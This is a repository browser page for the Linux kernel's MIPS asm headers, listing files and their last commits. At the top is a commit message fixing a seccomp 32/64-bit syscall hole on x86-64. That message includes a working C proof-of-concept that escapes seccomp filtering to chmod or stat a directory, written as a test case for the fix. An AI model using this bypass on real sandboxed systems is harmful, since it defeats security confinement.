linux-kernel-test/arch/mips/include/asm
Roland McGrath 5b1017404a x86-64: seccomp: fix 32/64 syscall hole
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
	    ret = snprintf (buf, sizeof buf,
			    "stat . -> st_uid=%u\n", st[7]);
	  else
	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
	#else
	# error "not this one"
	#endif

	  write (1, buf, ret);

	  syscall (__NR_exit, 1);
	  return 2;
	}

Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
  at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2009-03-02 15:41:30 -08:00
..
dec MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
emma MIPS: EMMA2RH: Remove emma2rh_sync on read operation 2008-10-27 16:18:30 +00:00
fw MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
ip32 MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
lasat MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mach-au1x00 MIPS: Alchemy: new userspace suspend interface for development boards. 2009-01-11 09:57:27 +00:00
mach-bcm47xx MIPS: BCM47xx: Use the new SSB GPIO API 2008-10-15 12:46:50 +01:00
mach-cavium-octeon MIPS: Add Cavium OCTEON processor support files to arch/mips/cavium-octeon. 2009-01-11 09:57:21 +00:00
mach-cobalt MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mach-db1x00 MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mach-dec MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mach-emma2rh MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mach-excite MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mach-generic MIPS: Adjust the dma-common.c platform hooks. 2009-01-11 09:57:24 +00:00
mach-ip22 MIPS: IP22/28: Switch over to RTC class driver 2008-10-15 12:46:51 +01:00
mach-ip27 MIPS: Adjust the dma-common.c platform hooks. 2009-01-11 09:57:24 +00:00
mach-ip28 MIPS: IP22/28: Switch over to RTC class driver 2008-10-15 12:46:51 +01:00
mach-ip32 MIPS: Adjust the dma-common.c platform hooks. 2009-01-11 09:57:24 +00:00
mach-jazz MIPS: Adjust the dma-common.c platform hooks. 2009-01-11 09:57:24 +00:00
mach-lasat MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mach-lemote MIPS: Adjust the dma-common.c platform hooks. 2009-01-11 09:57:24 +00:00
mach-malta MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mach-mipssim MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mach-pb1x00 MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mach-pnx833x MIPS: Add support for NXP PNX833x (STB222/5) into linux kernel 2008-10-27 16:18:29 +00:00
mach-pnx8550 MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mach-rc32434 MIPS: RB532: Export rb532_gpio_set_func() 2009-01-30 21:33:01 +00:00
mach-rm MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mach-sibyte MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mach-tx39xx MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mach-tx49xx MIPS: RBTX4939: Add smc91x support 2008-10-27 16:18:27 +00:00
mach-vr41xx MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mach-wrppmc MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mach-yosemite MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mips-boards MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
octeon MIPS: Add Cavium OCTEON processor support files to arch/mips/cavium-octeon. 2009-01-11 09:57:21 +00:00
pci MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
pmc-sierra/msp71xx MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
sgi MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
sibyte MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
sn MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
txx9 MIPS: TXx9: Add support for TX4939 internal RTC 2009-01-30 21:32:58 +00:00
vr41xx MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
xtalk MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
abi.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
addrspace.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
asm.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
asmmacro-32.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
asmmacro-64.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
asmmacro.h MIPS: Use EI/DI for MIPS R2. 2008-12-12 18:12:23 +00:00
atomic.h MIPS: atomic_*(): Change type of intermediate variables. 2009-01-30 21:32:57 +00:00
auxvec.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
barrier.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
bcache.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
bitops.h MIPS: Clean up MIPSxx-optimized bitop functions 2008-10-30 14:44:33 +00:00
bootinfo.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
branch.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
break.h MIPS: Switch FPU emulator trap to BREAK instruction. 2008-10-30 14:44:34 +00:00
bug.h MIPS: Make BUG() __noreturn. 2008-11-24 16:35:07 +00:00
bugs.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
byteorder.h byteorder: make swab.h include asm/swab.h like a regular header 2009-01-14 19:56:50 -08:00
cache.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
cachectl.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
cacheflush.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
cacheops.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
cevt-r4k.h MIPS: Have a heart for a lonely, lost header file ... 2008-10-15 12:46:49 +01:00
checksum.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
cmp.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
cmpxchg.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
compat-signal.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
compat.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
compiler.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
cpu-features.h MIPS: Hook Cavium OCTEON cache init into cache.c 2009-01-11 09:57:22 +00:00
cpu-info.h MIPS: Add HARDWARE_WATCHPOINTS definitions and support code. 2008-10-11 16:18:56 +01:00
cpu.h MIPS: Add Cavium OCTEON processor constants and CPU probe. 2009-01-11 09:57:22 +00:00
cputime.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
current.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
debug.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
delay.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
device.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
div64.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
dma-mapping.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
dma.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
ds1287.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
dsp.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
edac.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
elf.h MIPS: Fix preprocessor warnings flaged by GCC 4.4 2008-12-22 08:54:47 +00:00
emergency-restart.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
errno.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
fb.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
fcntl.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
fixmap.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
floppy.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
fpregdef.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
fpu_emulator.h MIPS: Switch FPU emulator trap to BREAK instruction. 2008-10-30 14:44:34 +00:00
fpu.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
futex.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
gcmpregs.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
gic.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
gpio.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
gt64120.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
hardirq.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
hazards.h MIPS: For Cavium OCTEON handle hazards as per the R10000 handling. 2009-01-11 09:57:21 +00:00
highmem.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
hw_irq.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
i8253.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
i8259.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
ide.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
inst.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
io.h MIPS: Modify core io.h macros to account for the Octeon Errata Core-301. 2009-01-11 09:57:22 +00:00
ioctl.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
ioctls.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
ipcbuf.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
irq_cpu.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
irq_gt641xx.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
irq_regs.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
irq.h cpumask: make irq_set_affinity() take a const struct cpumask 2008-12-13 21:20:26 +10:30
irqflags.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
isadep.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
jazz.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
jazzdma.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
Kbuild byteorder: make swab.h include asm/swab.h like a regular header 2009-01-14 19:56:50 -08:00
kdebug.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
kexec.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
kgdb.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
kmap_types.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
kspd.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
linkage.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
local.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
m48t37.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mc146818-time.h mips: use bcd2bin/bin2bcd 2008-10-20 08:52:41 -07:00
mc146818rtc.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mips_mt.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mipsmtregs.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mipsprom.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mipsregs.h MIPS: Override assembler target architecture for octeon. 2009-01-11 09:57:21 +00:00
mman.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mmu_context.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mmu.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mmzone.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
module.h MIPS: Add Cavium OCTEON processor constants and CPU probe. 2009-01-11 09:57:22 +00:00
msc01_ic.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
msgbuf.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
mutex.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
nile4.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
paccess.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
page.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
param.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
parport.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
pci.h MIPS: Better than nothing implementation of PCI mmap to fix X. 2008-12-09 21:55:43 +00:00
percpu.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
pgalloc.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
pgtable-32.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
pgtable-64.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
pgtable-bits.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
pgtable.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
pmon.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
poll.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
posix_types.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
prefetch.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
processor.h MIPS: Add Cavium OCTEON cop2/cvmseg state entries to processor.h. 2009-01-11 09:57:22 +00:00
ptrace.h MIPS: Fix a typo in watchpoint register structure. 2009-01-30 21:32:58 +00:00
r4k-timer.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
r4kcache.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
reboot.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
reg.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
regdef.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
resource.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
rm9k-ocd.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
rtlx.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
scatterlist.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
seccomp.h x86-64: seccomp: fix 32/64 syscall hole 2009-03-02 15:41:30 -08:00
sections.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
segment.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
sembuf.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
serial.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
setup.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
sgialib.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
sgiarcs.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
sgidefs.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
shmbuf.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
shmparam.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
sigcontext.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
siginfo.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
signal.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
sim.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
smp-ops.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
smp.h MIPS: Add SMP_ICACHE_FLUSH for the Cavium CPU family. 2009-01-11 09:57:24 +00:00
smtc_ipi.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
smtc_proc.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
smtc.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
smvp.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
sni.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
socket.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
sockios.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
sparsemem.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
spinlock_types.h MIPS: Rewrite spinlocks to ticket locks. 2008-10-11 16:18:54 +01:00
spinlock.h x86: spinlocks: define dummy __raw_spin_is_contended 2009-02-09 08:15:39 -08:00
stackframe.h MIPS: Cavium OCTEON multiplier state preservation. 2009-01-11 09:57:24 +00:00
stacktrace.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
stat.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
statfs.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
string.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
suspend.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
swab.h mips: introduce asm/swab.h 2009-01-06 18:10:27 -08:00
sysmips.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
system.h MIPS: Scheduler support for HARDWARE_WATCHPOINTS. 2008-10-11 16:18:57 +01:00
termbits.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
termios.h MIPS: Add return value checks to user_termio_to_kernel_termios() 2009-01-30 21:32:57 +00:00
thread_info.h MIPS: Add HARDWARE_WATCHPOINTS definitions and support code. 2008-10-11 16:18:56 +01:00
time.h MIPS: make cp0 counter clocksource/event usable as fallback. 2009-01-11 09:57:26 +00:00
timex.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
titan_dep.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
tlb.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
tlbdebug.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
tlbflush.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
topology.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
traps.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
txx9irq.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
txx9pio.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
txx9tmr.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
types.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
uaccess.h MIPS: Replace use of <asm-generic/uaccess.h> with native implementations. 2008-10-11 16:18:54 +01:00
ucontext.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
unaligned.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
unistd.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
user.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
vga.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
vpe.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
war.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
watch.h MIPS: Add HARDWARE_WATCHPOINTS definitions and support code. 2008-10-11 16:18:56 +01:00
wbflush.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00
xor.h MIPS: Move headfiles to new location below arch/mips/include 2008-10-11 16:18:52 +01:00